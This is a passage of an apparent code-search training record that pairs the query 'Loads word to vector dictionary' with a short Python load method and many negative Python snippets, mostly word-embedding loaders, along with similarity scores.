u\"example_domain_distance\", u\"example_email_parsing_artifact\", u\"example_email_parsing_attachment\", u\"example_extract_ssl_cert_from_url\", u\"example_get_incident_contact_info\", u\"example_get_task_contact_info\", u\"example_json2html\", u\"example_parse_ssl_certificate\", u\"example_pdfid\", u\"example_resilient_search\", u\"example_shell_command\", u\"example_string_to_attachment\", u\"example_timer\", u\"example_timer_parallel\", u\"example_xml_transformation\", u\"example_zip_list\", u\"example_zip_to_artifact\", u\"utilities_expand_url\"],\n \"actions\": [u\"Example: (Artifact) Attachment to Base64\", u\"Example: Artifact Hash\", u\"Example: Attachment Hash\", u\"Example: Attachment to Base64\", u\"Example: Call REST API\", u\"Example: Domain Distance\", u\"Example: Email Parsing (Artifact)\", u\"Example: Email Parsing (Attachment)\", u\"Example: Expand URL\", u\"Example: Extract SSL Certificate\", u\"Example: Get Incident Contact Info\", u\"Example: Get Task Contact Info\", u\"Example: JSON2HTML\", u\"Example: Parse SSL Certificate\", u\"Example: PDFiD\", u\"Example: Resilient Search\", u\"Example: Shell Command\", u\"Example: String to Attachment\", u\"Example: Timer Epoch\", u\"Example: Timers in Parallel\", u\"Example: Use Excel Data\", u\"Example: XML Transformation\", u\"Example: Zip Extract\", u\"Example: Zip List\"],\n \"incident_fields\": [],\n \"incident_artifact_types\": [],\n \"incident_types\": [],\n \"datatables\": [],\n \"automatic_tasks\": [],\n \"scripts\": [u\"Convert JSON to rich text v1.0\"],\n \"playbooks\": []\n }",
"def CopyToDict(self):\n return {'labels': self.labels}",
"def get_export_outputs_prediction_dict_smith_de(\n seq_embed_1, seq_embed_2, predicted_score, predicted_class,\n documents_match_labels, input_sent_embed_1, input_sent_embed_2,\n output_sent_embed_1, output_sent_embed_2):\n export_outputs = {\n tf.saved_model.signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY:\n tf_estimator.export.PredictOutput(predicted_score),\n \"seq_embed_1\":\n tf_estimator.export.PredictOutput(seq_embed_1),\n \"seq_embed_2\":\n tf_estimator.export.PredictOutput(seq_embed_2),\n \"input_sent_embed_1\":\n tf_estimator.export.PredictOutput(input_sent_embed_1),\n \"input_sent_embed_2\":\n tf_estimator.export.PredictOutput(input_sent_embed_2),\n \"output_sent_embed_1\":\n tf_estimator.export.PredictOutput(output_sent_embed_1),\n \"output_sent_embed_2\":\n tf_estimator.export.PredictOutput(output_sent_embed_2),\n \"predicted_class\":\n tf_estimator.export.PredictOutput(predicted_class),\n \"documents_match_labels\":\n tf_estimator.export.PredictOutput(documents_match_labels)\n }\n\n prediction_dict = {\n \"predicted_score\": predicted_score,\n \"predicted_class\": predicted_class,\n \"documents_match_labels\": documents_match_labels,\n \"seq_embed_1\": seq_embed_1,\n \"seq_embed_2\": seq_embed_2,\n \"input_sent_embed_1\": input_sent_embed_1,\n \"input_sent_embed_2\": input_sent_embed_2,\n \"output_sent_embed_1\": output_sent_embed_1,\n \"output_sent_embed_2\": output_sent_embed_2\n }\n return (export_outputs, prediction_dict)",
"def main() -> None:\n\n args = get_args()\n\n if not os.path.isdir(args.outdir):\n os.makedirs(args.outdir)\n\n print('Starting export... (--verbose for updates)')\n\n variables = set()\n measurements_file = os.path.join(args.outdir, 'scrutinizer.csv')\n with open(measurements_file, 'wt') as measurements_fh:\n writer = csv.DictWriter(measurements_fh,\n fieldnames=[\n 'source', 'unit', 'variable_name',\n 'location_name', 'location_type', 'value',\n 'collected_on', 'medium', 'variable_desc'\n ],\n quoting=csv.QUOTE_NONNUMERIC)\n writer.writeheader()\n\n for i, m in enumerate(Measurement, start=1):\n if args.verbose:\n print(f'{i:6}: {m.variable.variable} {m.value}')\n\n writer.writerow({\n 'source': m.variable.source.source,\n 'unit': m.variable.unit,\n 'variable_name': m.variable.variable,\n 'variable_desc': m.variable.description,\n 'location_name': str(m.location.location_name),\n 'location_type': m.location.location_type.location_type,\n 'value': m.value,\n 'collected_on': m.collected_on,\n 'medium': m.medium.medium,\n })\n\n variables.add((m.variable.variable, m.variable.description))\n\n variables_file = os.path.join(args.outdir, 'variables.csv')\n with open(variables_file, 'wt') as variables_fh:\n writer = csv.DictWriter(variables_fh, fieldnames=['name', 'desc'])\n writer.writeheader()\n for key, val in dict(variables).items():\n writer.writerow({'name': key, 'desc': val})\n\n print(f'Done, see outdir \"{args.outdir}\".')",
"def _retrieve_solution(self, m):\n result = {} # {component: {resource: production}}\n for comp in m.Components:\n prod = getattr(m, '{n}_production'.format(n=comp.name))\n result[comp.name] = {}\n for res, comp_r in m.resource_index_map[comp].items():\n result[comp.name][res] = np.fromiter((prod[comp_r, t].value for t in m.T), dtype=float, count=len(m.T))\n return result",
"def index_nodes(self):\n out = {}\n\n #avg = np.mean(list(self.rtype_vectors.values()),axis=0)\n\n\n #for name, node in self.nodes.items():\n # tmp1 = [self.rtype_vectors[rtype]\n # for rtype, dest in node.outgoing_relations] or [NULL_VEC()]\n # tmp2 = [permute_rtype_vector(self.rtype_vectors[rtype])\n # for rtype, prev in node.incoming_relations] or [NULL_VEC()]\n\n # net = tmp1 + tmp2\n\n # #out[name] = np.asarray(net).mean(axis=0)\n # #out[name] = np.asarray(net).sum(axis=0)\n # v = np.asarray(net).sum(axis=0)\n # if v.any():\n # out[name] = v/max(v)#softmax(v/max(v))\n # else:\n # out[name] = v\n\n\n #avg = np.mean(list(out.values()),axis=0)\n\n #maxm = np.max(list(out.values()),axis=0)\n\n ####normalize everything\n #for r,v in out.items():\n # if v.any():\n # #out[r] = v / sqrt(v.dot(v))\n # out[r] = softmax((v-avg)/maxm)\n\n\n\n # PCA method 0001701\n rmap = self.rtype_vectors\n data = np.zeros((len(self.nodes), JACCARD_DIMENSIONS), dtype=np.float)\n ix = 0\n for node in self.nodes.values():\n\n #compute weighted average of each relation type\n tmp = [rmap[rtype] for \n rtype, dest in node.outgoing_relations] + \\\n [permute_rtype_vector(rmap[rtype]) for \n rtype, prev in node.incoming_relations]\n\n v = np.asarray(tmp).mean(axis=0) if tmp else NULL_VEC()\n\n #normalize\n if v.any():\n data[ix] = v / sqrt(v.dot(v))\n else:\n data[ix] = v\n ix += 1\n\n #eliminate projection onto first 7 principal components\n d2 = data - PCA(data, 7)\n\n #order of nodes is preserved\n for i,v in enumerate(self.nodes):\n out[v] = softmax(d2[i])\n\n return out",
"def save_class_representation(self):\n class_dict = {}\n for key, value in self.class_dict.items():\n class_dict['-'.join(key)] = list(value)\n with open('data/class_vectors.txt', 'w') as file:\n json.dump(class_dict, file)\n return class_dict",
"def new_counts_dict():\n\n\tIN_FILES = [\"../_semtag_dataset_webanno_tfidf_inimigo.txt\",\"../_semtag_dataset_webanno_tfidf_publico.txt\" ]\n\n\ttxt = []\n\tfor in_file in IN_FILES:\n\t with codecs.open(in_file,\"r\",\"utf-8\") as fid:\n\t txt += fid.readlines()\n\t#words\n\twords = [w for m in txt for w in m.split()]\n\t#unique words\n\twords = list(set(words))\n\t#word index\n\twrd2idx = {w:-1 for w in words}\n\n\tset_trace()\n\t\n\twith open(COUNTS_DIC,\"w\") as fod:\n\t\tcPickle.dump(wrd2idx, fod, cPickle.HIGHEST_PROTOCOL)",
"def write_vectors(self, filename):\n svu.write_realvectors(self,filename)"
] | [
"0.6104261",
"0.6104261",
"0.59266806",
"0.5733242",
"0.567408",
"0.5661961",
"0.5612445",
"0.5592986",
"0.55927783",
"0.549614",
"0.5439975",
"0.5427137",
"0.54063416",
"0.53769064",
"0.5355195",
"0.53128344",
"0.53023034",
"0.52946824",
"0.5286039",
"0.52819043",
"0.5276488",
"0.5270589",
"0.5239066",
"0.52271557",
"0.52040166",
"0.51995933",
"0.51658094",
"0.5133373",
"0.512791",
"0.511702",
"0.5098492",
"0.5089017",
"0.5087816",
"0.5073769",
"0.50725853",
"0.5071858",
"0.5063045",
"0.50591195",
"0.505701",
"0.504759",
"0.50470185",
"0.50396556",
"0.5039108",
"0.50299954",
"0.5022235",
"0.5013165",
"0.5008832",
"0.5002655",
"0.5000345",
"0.49967262",
"0.49888214",
"0.4985091",
"0.49795467",
"0.4974698",
"0.49717835",
"0.49669546",
"0.49640995",
"0.4962136",
"0.4952939",
"0.49514055",
"0.49476412",
"0.4945526",
"0.4941939",
"0.4939378",
"0.49344397",
"0.4932449",
"0.49302596",
"0.4927369",
"0.49263328",
"0.49233678",
"0.49042955",
"0.48983768",
"0.48957658",
"0.48904097",
"0.48892003",
"0.48889345",
"0.4888916",
"0.4885785",
"0.48837376",
"0.48773152",
"0.48757672",
"0.48706177",
"0.48661974",
"0.48640484",
"0.4861954",
"0.48613632",
"0.48543543",
"0.48508796",
"0.48468566",
"0.48455527",
"0.48446858",
"0.48416597",
"0.4833972",
"0.48339003",
"0.48310867",
"0.48302278",
"0.4830133",
"0.48299205",
"0.48292616",
"0.48282084",
"0.48243672"
] | 0.0 | -1 |
Loads word to vector dictionary. If pickle exists, it will use that since it's easiest to load in. | def load(self, dirname=None):
self.genio.load(dirname)
logging.info(f'Loaded word vectorizations at {dirname}') | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def load_vector_dictionary():\n return read_word2vecs_from_file(VECTOR_FILE)",
"def load_word2vec(self, path, binary=True, reserve_zero=True, reserve_oov_token=True):\n self.allow_oov = reserve_oov_token\n self.reserve_zero = reserve_zero\n words = []\n if self.reserve_zero:\n words.append('__ZERO__')\n if self.allow_oov:\n words.append('__OUT_OF_VOCAB__')\n self.oov_index = len(words) - 1\n\n if binary:\n with open(path, 'rb') as f:\n # Get number of vectors and vector size\n # from first line\n num_vectors, vector_size = map(\n int, f.readline().decode('UTF-8').split())\n FLOAT_SIZE = 4\n\n self._matrix = np.zeros(\n [num_vectors + len(words), vector_size], dtype='float32')\n # Assign random vector for OOV token if it exists\n if self.allow_oov:\n self._matrix[self.oov_index] = np.random.randn(vector_size, )\n\n update = words.append # Speedup\n for i in tqdm(range(len(words), num_vectors+len(words))):\n # Reads until a whitespace is found (get a word)\n word = b\"\"\n while True:\n char = f.read(1)\n if char == b\" \":\n break\n word += char\n update(word)\n #Read vector\n vecs = f.read(FLOAT_SIZE * vector_size)\n self._matrix[i] = np.frombuffer(vecs, 'f')\n\n self.vocab = words\n else:\n print(\"This feature is yet to be implemented\")",
"def load(self):\n self.word2vec, self.img2sentence, self.word_freq, self.num_words, self.word2idx, self.idx2word = pickle.load(open(self.save_file, 'rb'))",
"def load_dict(path_to_vec):\n emb = {}\n with open(path_to_vec, 'r', errors='ignore', encoding='utf8') as f:\n for line in f:\n values = line.split()\n word = values[0]\n vector = np.asarray(values[1:], \"float32\")\n emb[word] = vector\n return emb",
"def load_word2vec(path):\n model = gensim.models.KeyedVectors.load_word2vec_format(path, binary=True) \n return model",
"def load_vec(fname, vocab, binary = True):\n print(\" Loading word2vec...\")\n #w2v_cache = \"cache\\\\w2v\"\n #if os.path.isfile(w2v_cache):\n # return cPickle.load(open(w2v_cache,\"rb\"))\n\n mode = (\"rb\" if binary else \"r\")\n word_vecs = {}\n with open(fname, mode) as f:\n header = f.readline()\n vocab_size, layer1_size = map(int, header.split())\n binary_len = numpy.dtype('float32').itemsize * layer1_size\n\n def getline():\n if binary:\n return numpy.fromstring(f.read(binary_len), dtype='float32')\n else:\n return numpy.array(f.readline().split(), dtype='float32')\n\n for line in xrange(vocab_size):\n word = []\n while True:\n ch = f.read(1)\n if ch == ' ':\n word = ''.join(word)\n break\n if ch != '\\n':\n word.append(ch)\n if word in vocab:\n word_vecs[word] = getline()\n else:\n getline()\n print(\" Loaded word2vec...\")\n# cPickle.dump(word_vecs, open(w2v_cache, \"wb\"))\n return word_vecs",
"def load_word_vectors(root, wv_type, dim):\n if isinstance(dim, int):\n dim = str(dim) + 'd'\n fname = os.path.join(root, wv_type + '.' + dim)\n if os.path.isfile(fname + '.pt'):\n fname_pt = fname + '.pt'\n print('loading word vectors from', fname_pt)\n return torch.load(fname_pt)\n if os.path.isfile(fname + '.txt'):\n fname_txt = fname + '.txt'\n print('loading word vectors from', fname_txt)\n cm = open(fname_txt, 'rb')\n elif os.path.basename(wv_type) in URL:\n url = URL[wv_type]\n print('downloading word vectors from {}'.format(url))\n r = requests.get(url, stream=True)\n with zipfile.ZipFile(six.BytesIO(r.content)) as zf:\n print('extracting word vectors into {}'.format(root))\n zf.extractall(root)\n return load_word_vectors(root, wv_type, dim)\n else:\n print('Unable to load word vectors.')\n\n wv_tokens, wv_arr, wv_size = [], array.array('d'), None\n with cm as f:\n for line in f:\n entries = line.strip().split(b' ')\n word, entries = entries[0], entries[1:]\n if wv_size is None:\n wv_size = len(entries)\n try:\n word = word.decode()\n except:\n print('non-UTF8 token', repr(word), 'ignored')\n continue\n wv_arr.extend(float(x) for x in entries)\n wv_tokens.append(word)\n\n wv_dict = {word: i for i, word in enumerate(wv_tokens)}\n wv_arr = torch.Tensor(wv_arr).view(-1, wv_size)\n ret = (wv_dict, wv_arr, wv_size)\n torch.save(ret, fname + '.pt')\n return ret",
"def load(cls, filepath) -> 'Word2VecEmbedding':\n with open(filepath, 'rb') as f:\n embedding = pickle.load(f)\n embedding.word2idx = {spell: idx for idx, spell in enumerate(embedding.vocab.idx2word)}\n return embedding",
"def load_vectors_novocab(path: str) -> (Optional[str], dict):\n print(f\"Started loading vectors from {path} @ {datetime.now()}\")\n words = dict()\n try:\n with open(file=path, mode=\"r\", encoding=\"utf-8\") as source_file:\n # Get the first line. Check if there's only 2 space-separated strings (hints a dimension)\n dimensions = str(next(source_file))\n if len(dimensions.split(\" \")) == 2:\n # We have a dimensions line. Keep it in the variable, continue with the next lines\n pass\n else:\n # We do not have a dimensions line\n line = dimensions.split(' ', 1)\n key = line[0]\n words[key] = np.fromstring(line[1], dtype=\"float32\", sep=' ')\n dimensions = None\n for line in source_file:\n line = line.split(' ', 1)\n key = line[0]\n words[key] = np.fromstring(line[1], dtype=\"float32\", sep=' ')\n except OSError:\n print(\"Unable to read word vectors, aborting.\")\n return {}\n print(f\"Finished loading a total of {len(words)} vectors @ {datetime.now()}\")\n return dimensions, normalise(words)",
"def load_word2vect(self, file_path):\n self.embeddings = []\n self.word_to_idx = {'<pad>' : 0}\n self.vocab = ['<pad>']\n\n model = w2v.load(file_path)\n self.embedding_size = model.vectors.shape[1]\n pad_embedding = np.zeros(self.embedding_size, \"float32\")\n self.embeddings.append(pad_embedding)\n\n train_words_set = set([word for text in self.train_data for word in\n text[1].split(\" \")])\n\n for w in model.vocab:\n if w in train_words_set:\n self.word_to_idx[w] = len(self.vocab)\n self.vocab.append(w)\n self.embeddings.append(model[w])\n\n del model",
"def get_vector(self, word):\n string = \"SELECT * FROM Vectors WHERE name=?\"\n params = (word,)\n self.cur.execute(string, params)\n raw_vector = self.cur.fetchone()\n if raw_vector is None:\n raise KeyError(\"Vector not found\")\n else:\n vector = pickle.loads(raw_vector[1])\n return vector",
"def get_weibo_data(vocab_file, vector_file):\n if os.path.exists(\"word_misc.pkl\"):\n return cPickle.load(open(\"word_misc.pkl\", \"rb\"))\n\n word_misc, word2id, id2word = {}, {}, {}\n word_count = 0\n\n # vocab file\n print \"Building vocabulary ...\"\n for lines in open(vocab_file).readlines():\n word = lines.split()[0]\n if not is_unwanted_words(word, ['', '\\n']):\n word2id[word] = word_count\n id2word[word_count] = word\n word_count += 1\n word2id['_START'] = word_count\n id2word[word_count] = '_START'\n word_count += 1\n word2id['_END'] = word_count\n id2word[word_count] = '_END'\n word_count += 1\n word2id['_UNK'] = word_count\n id2word[word_count] = '_UNK'\n word_count += 1\n word2id['_MASK'] = word_count\n id2word[word_count] = '_MASK'\n word_count += 1\n print \"Vocabulary size:\", word_count\n\n # Initialization is refered to in https://www.tensorflow.org/versions/r0.7/tutorials/word2vec/index.html\n word_emb = (1/np.sqrt(word_count)*(2*np.random.rand(word_count, options['embedding_size']) - 1)).tolist()\n\n # load word vectors\n for lines in open(vector_file).readlines()[1:]:\n word = lines.split()[0]\n #if word == '</s>' or word not in word2id.keys():\n # continue\n if word not in word2id.keys():\n continue\n ids = word2id[word]\n #print ids, lines, len(word_emb)\n word_emb[ids] = [float(w) for w in lines.split()[1:]]\n\n print len(word_emb), \"words have been loaded with\", len(word_emb[0]), \"dimensions\"\n\n # load word misc\n word_misc['id2word'] = id2word\n word_misc['word2id'] = word2id\n word_misc['word_count'] = word_count\n word_misc['word_emb'] = word_emb\n cPickle.dump(word_misc, open(\"word_misc.pkl\", \"wb\"))\n print \"Dump complete.\"\n return word_misc",
"def load_bin_vec(fname, vocab):\n word_vecs = {}\n with open(fname, \"rb\") as f:\n header = f.readline()\n vocab_size, layer1_size = map(int, header.split())\n binary_len = np.dtype('float32').itemsize * layer1_size\n for line in xrange(vocab_size):\n word = []\n while True:\n ch = f.read(1)\n if ch == ' ':\n word = ''.join(word)\n break\n if ch != '\\n':\n word.append(ch)\n if word in vocab:\n word_vecs[word] = np.fromstring(f.read(binary_len), dtype='float32') \n else:\n f.read(binary_len)\n cPickle.dump(word_vecs, open(\"./data/word_vecs.pkl\", \"w\"))\n return word_vecs",
"def load(self, path='dict.pic'):\n with open(path, 'rb') as f:\n self.__dictionary = pickle.load(f)\n self.__vocab_size = len(self.__dictionary)\n\n if self.__verbose:\n print('Loading Tokenizer, vocab size:', self.vocab_size())",
"def load_word2vec_model():\n logging.basicConfig(\n format='%(asctime)s : %(levelname)s : %(message)s', \n level=logging.INFO)\n model_path = '/playpen/home/tongn/GoogleNews-vectors-negative300.bin'\n model = KeyedVectors.load_word2vec_format(fname=model_path, binary=True)\n return model",
"def vocab_from_pickle(path: str) -> Dict:\n with open(path, \"rb\") as inp:\n vocab = pickle.load(inp)\n logger.info('Vocabulary (%d words) loaded from \"%s\"', len(vocab), path)\n return vocab",
"def load_pretrained_vectors(self, emb_file, fixed):\n if emb_file:\n pretrained = torch.load(emb_file)\n self.word_lut.weight.data.copy_(pretrained)\n if fixed:\n self.word_lut.weight.requires_grad = False",
"def load_word_embeddings(self, word_embeddings, word_to_ix):\n logger.info(\"Loading the vocabulary\")\n self.vocab = {}\n self.index2word = []\n counts = {}\n for word in word_to_ix:\n counts[word] = counts.get(word, 0) + 1\n self.vocab_size = len(counts)\n self.vector_size = word_embeddings.shape[1]\n self.vectors = np.zeros((self.vocab_size, self.vector_size))\n self.index2word = [None] * self.vocab_size\n logger.info(\"Corpus has %i words\", len(self.vocab))\n for word_id, word in enumerate(counts):\n self.vocab[word] = Vocab(index=word_id, count=counts[word])\n self.vectors[word_id] = word_embeddings[word_to_ix[word]]\n self.index2word[word_id] = word\n assert((len(self.vocab), self.vector_size) == self.vectors.shape)\n logger.info(\"Loaded matrix of %d size and %d dimensions\", self.vocab_size, self.vector_size)",
"def load_word2vec_embeddings(word2vec_file, word_map):\n # Load word2vec model into memory\n w2v = gensim.models.KeyedVectors.load(word2vec_file, mmap='r')\n\n\n\n # Create tensor to hold embeddings for words that are in-corpus\n # word_map 내 단어들에 대한 임베딩 벡터 만들기\n embeddings = torch.FloatTensor(len(word_map), w2v.vector_size)\n init_embedding(embeddings)\n\n # Read embedding file\n\n for word in word_map:\n if word in w2v.vocab:\n embeddings[word_map[word]] = torch.FloatTensor(w2v[word])\n\n\n return embeddings, w2v.vector_size",
"def load_bin_vec(word2vec, vocab):\n word_vecs = {}\n with open(word2vec, \"rb\") as f:\n header = f.readline()\n vocab_size, layer1_size = map(int, header.split())\n binary_len = np.dtype('float32').itemsize * layer1_size\n for line in xrange(vocab_size):\n word = []\n while True:\n ch = f.read(1)\n if ch == ' ':\n word = ''.join(word)\n break\n if ch != '\\n':\n word.append(ch)\n if word in vocab:\n word_vecs[word] = np.fromstring(f.read(binary_len), dtype='float32')\n else:\n f.read(binary_len)\n return word_vecs",
"def load_glove_vec(fname, vocab):\n word_vecs = {}\n with open(fname, \"rb\") as f:\n for i,line in enumerate(f):\n L = line.split()\n word = L[0].lower()\n if word in vocab:\n word_vecs[word] = np.array(L[1:], dtype='float32')\n return word_vecs",
"def load_embeddings(embeddings_path):\n\n embeddings_index = {}\n f = open(embeddings_path, encoding='utf-8')\n for line in tqdm(f):\n values = line.rstrip().split(' ')\n word = values[0]\n coefs = np.asarray(values[1:], dtype='float32')\n embeddings_index[word] = coefs\n f.close()\n print('Found {} word vectors.'.format(len(embeddings_index)))\n return embeddings_index",
"def load_word_index(path):\n word_index = open(path + '/word_index.pickle', 'rb')\n word_index = pickle.load(word_index)\n print('Word Index Pickle load successful\\n')\n return word_index",
"def load_word2vec_format(cls, *args, **kwargs):\n raise NotImplementedError(\"Not supported. Use gensim.models.KeyedVectors.load_word2vec_format instead.\")",
"def load_vectors(path: str, vocabulary: set) -> (Optional[str], dict):\n print(f\"Started loading vectors from {path} @ {datetime.now()}\")\n print(f\"No. of words in vocabulary: {len(vocabulary)}\")\n words = dict()\n try:\n with open(file=path, mode=\"r\", encoding=\"utf-8\") as source_file:\n # Get the first line. Check if there's only 2 space-separated strings (hints a dimension)\n dimensions = str(next(source_file))\n if len(dimensions.split(\" \")) == 2:\n # We have a dimensions line. Keep it in the variable, continue with the next lines\n pass\n else:\n # We do not have a dimensions line\n line = dimensions.split(' ', 1)\n key = line[0]\n if key in vocabulary:\n words[key] = np.fromstring(line[1], dtype=\"float32\", sep=' ')\n dimensions = None\n for line in source_file:\n line = line.split(' ', 1)\n key = line[0]\n if key in vocabulary:\n words[key] = np.fromstring(line[1], dtype=\"float32\", sep=' ')\n except:\n print(\"Unable to read word vectors, aborting.\")\n return None\n print(f\"Finished loading a total of {len(words)} vectors @ {datetime.now()}\")\n return dimensions, normalise(words)",
"def load_vectors(path, to_train=False):\n model = Word2Vec.load(path)\n\n if to_train:\n return model\n\n # In case it doesn't need to be trained, delete train code to free up ram\n word_vectors = model.wv\n\n context_vectors = dict()\n if hasattr(model, \"syn1\"):\n # For hierarchical softmax\n context_vectors = model.syn1\n elif hasattr(model, \"syn1neg\"):\n # For negative sampling\n context_vectors = model.syn1neg\n\n del model # Save memory\n return VectorCollection(word_vectors, context_vectors)",
"def load_word2vec(emb_path, id_to_word, word_dim, old_weights):\n new_weights = old_weights\n print('Loading pretrained embeddings from {}...'.format(emb_path))\n pre_trained = {}\n emb_invalid = 0\n for i, line in enumerate(codecs.open(emb_path, 'r', 'utf-8')):\n line = line.rstrip().split()\n if len(line) == word_dim + 1:\n pre_trained[line[0]] = np.array(\n [float(x) for x in line[1:]]\n ).astype(np.float32)\n else:\n emb_invalid += 1\n if emb_invalid > 0:\n print('WARNING: %i invalid lines' % emb_invalid)\n c_found = 0\n c_lower = 0\n c_zeros = 0\n n_words = len(id_to_word)\n # Lookup table initialization\n for i in range(n_words):\n word = id_to_word[i]\n if word in pre_trained:\n new_weights[i] = pre_trained[word]\n c_found += 1\n elif word.lower() in pre_trained:\n new_weights[i] = pre_trained[word.lower()]\n c_lower += 1\n elif re.sub('\\d', '0', word.lower()) in pre_trained:\n new_weights[i] = pre_trained[\n re.sub('\\d', '0', word.lower())\n ]\n c_zeros += 1\n print('Loaded %i pretrained embeddings.' % len(pre_trained))\n print('%i / %i (%.4f%%) words have been initialized with '\n 'pretrained embeddings.' % (\n c_found + c_lower + c_zeros, n_words,\n 100. * (c_found + c_lower + c_zeros) / n_words)\n )\n print('%i found directly, %i after lowercasing, '\n '%i after lowercasing + zero.' % (\n c_found, c_lower, c_zeros\n ))\n return new_weights",
"def load_vocab(fn):\n return corpora.Dictionary.load(fn)",
"def load_bin_vec(self, fname, vocab):\n word_vecs = {}\n with open(fname, \"rb\") as f:\n header = f.readline()\n print header\n vocab_size, layer1_size = map(int, header.split())\n binary_len = np.dtype('float32').itemsize * layer1_size\n for line in xrange(vocab_size):\n word = []\n while True:\n ch = f.read(1)\n if ch == ' ':\n word = ''.join(word)\n break\n if ch != '\\n':\n word.append(ch)\n if word in vocab:\n word_vecs[word] = np.fromstring(f.read(binary_len), dtype='float32')\n # logger.info(word_vecs[word])\n else:\n f.read(binary_len)\n # logger.info(\"num words already in word2vec: \" + str(len(word_vecs)))\n return word_vecs",
"def load_embeddings(filepath, vocabulary, retain):\n \n word2index = dict()\n word_vectors = list()\n\n def add_entry(word, vector):\n word2index[word] = len(word2index)\n word_vectors.append(vector)\n\n model = gensim.models.KeyedVectors.load(filepath)\n\n # adding special tokens <FIL>, <UNK> and <NUM>\n dim = model.vector_size\n add_entry('<fil>', np.zeros((dim,)))\n for special in ['<unk>', '<num>']:\n vector = np.random.uniform(-0.025, 0.025, (dim,))\n add_entry(special, vector)\n\n if retain:\n for word, _ in model.vocab.items():\n add_entry(word, model[word])\n else:\n for word in vocabulary:\n if word in model:\n add_entry(word, model[word])\n\n vocabulary = vocabulary.intersection(word2index.keys())\n return word2index, np.asarray(word_vectors)",
"def load_embedding_file(self):\n if self.language == 'en':\n embed_file_dir = self.embedding_path\n wv = KeyedVectors.load_word2vec_format(embed_file_dir, binary=True)\n self.pretrained_embedding = {}\n for word in wv.vocab.keys():\n normalized_word = normalization.process(self.language.upper(), word, letters_to_keep='', letters_to_remove='',\n lowercase=True, remove_repetitions_count=-1, remove_punct=True,\n remove_digits=True, remove_vowels=False, remove_diacritics=True,\n remove_spaces=False, remove_apostrophe=True, copy_through=False,\n keep_romanized_text=False)\n self.pretrained_embedding[normalized_word] = wv[word]\n self.embed_dim = 300\n\n else:\n embed_file_dir = self.embedding_path\n fin = open(embed_file_dir, 'r', encoding='utf-8', newline='\\n', errors='ignore')\n data = {}\n for line in fin:\n if len(line.split()) == 2: # header\n continue\n tokens = line.rstrip().split(' ')\n word = tokens[0]\n normalized_word = normalization.process(self.language.upper(), word, letters_to_keep='', letters_to_remove='',\n lowercase=True, remove_repetitions_count=-1, remove_punct=True,\n remove_digits=True, remove_vowels=False, remove_diacritics=True,\n remove_spaces=False, remove_apostrophe=True, copy_through=False,\n keep_romanized_text=False)\n data[normalized_word] = np.array(tokens[1:])\n self.pretrained_embedding = data\n self.embed_dim = 300",
"def load_embedding(fpath, VOCAB):\n print(\"Loading embeddings...\")\n emb = dict()\n wv_from_bin = KeyedVectors.load_word2vec_format(fpath, limit=VOCAB)\n for word, vector in tqdm(zip(wv_from_bin.vocab, wv_from_bin.vectors)):\n coefs = np.asarray(vector, dtype='float32')\n if word not in emb:\n emb[word] = coefs\n return emb",
"def load_bin_vec(fname, vocab):\n word_vecs = {}\n with open(fname, \"rb\") as f:\n header = f.readline()\n vocab_size, layer1_size = map(int, header.split())\n binary_len = np.dtype('float32').itemsize * layer1_size\n for line in xrange(vocab_size):\n word = []\n while True:\n ch = f.read(1)\n if ch == ' ':\n word = ''.join(word).lower()\n break\n if ch != '\\n':\n word.append(ch) \n if word in vocab:\n word_vecs[word] = np.fromstring(f.read(binary_len), dtype='float32') \n else:\n f.read(binary_len)\n return word_vecs",
"def load_embeddings(path, vocab, source_domain, target_domain, emb_name):\n\n pkl = './work/embeddings/%s_%s_%s.pkl' % (source_domain, target_domain, emb_name)\n if os.path.exists(pkl):\n print(\"Load embeddings from existing pkl file %s...\" % pkl)\n # word embeddings weights have been loaded\n embeddings = pickle.load(open(pkl, 'rb'))\n else:\n print(\"Load embedding from %s...\" % path)\n raw_embeddings = {}\n if emb_name == 'yelp_electronics':\n with open(path) as fp:\n for line in fp:\n word_vector = line.split(\",\")[:-1]\n vector_list = []\n for element in word_vector[len(word_vector) - 100:]:\n vector_list.append(float(element))\n word = ','.join(word_vector[:len(word_vector) - 100])\n vector = np.asarray(vector_list)\n if word in vocab:\n raw_embeddings[word] = vector\n else:\n with open(path) as fp:\n for line in fp:\n eles = line.strip().split(' ')\n word = eles[0]\n if word in vocab:\n raw_embeddings[word] = eles[1:]\n\n dim_w = len(raw_embeddings['the'])\n n_words = len(vocab)\n embeddings = np.zeros(shape=(n_words, dim_w))\n for w in vocab:\n wid = vocab[w]\n if w in raw_embeddings:\n embeddings[wid] = np.array([float(ele) for ele in raw_embeddings[w]])\n else:\n # for OOV words, add random initialization\n embeddings[wid] = np.random.uniform(-0.25, 0.25, dim_w)\n print(\"Find %s word embeddings...\" % len(embeddings))\n if not os.path.exists('./work/embeddings'):\n os.mkdir('./work/embeddings')\n emb_path = './work/embeddings/%s_%s_%s.pkl' % (source_domain, target_domain, emb_name)\n # write the embedding weights back to the disk\n pickle.dump(embeddings, open(emb_path, 'wb'))\n embeddings = np.array(embeddings, dtype='float32')\n return embeddings",
"def read_word2vec_model():\n file_name = \"word2vec_model.txt\"\n # these are the pre-2018 lines to load a model:\n # from gensim.models.word2vec import Word2Vec\n # m = Word2Vec.load_word2vec_format(file_name, binary=False)\n \n # here are the post-2018 lines to load a model:\n from gensim.models import KeyedVectors\n print(\"Starting to load the model in \", file_name, \"...\")\n m = KeyedVectors.load_word2vec_format(file_name, binary=False)\n print(\"Model loaded.\\n\")\n\n print(\"The model built is\", m, \"\\n\")\n print(\"m.vocab has\", len(m.vocab), \"words\")\n ## The above line should print\n ## m.vocab has 43981 words\n\n print(\"Each word is a vector of size\", m.vector_size)\n ## which should tells us that each word is represented by a 300-dimensional vector\n\n print(\"\\nTry m.get_vector('hello') to see one...!\\n\")\n ## Once the model is built, it can't be changed without rebuilding it; we'll leave it. \n\n return m",
"def load_vectors(fname):\r\n # taken from: https://fasttext.cc/docs/en/english-vectors.html\r\n vectors_data = vocab.Vectors(name=fname)\r\n\r\n return vectors_data",
"def get_vocab(self):\n if os.path.exists(self.vocab_file) & self.vocab_from_file:\n f = open(self.vocab_file, \"rb\")\n vocab = pickle.load(f)\n self.word2idx = vocab.word2idx\n self.idx2word = vocab.idx2word\n f.close()\n else:\n self.build_vocab()\n with open(self.vocab_file, 'wb') as f:\n pickle.dump(self, f)",
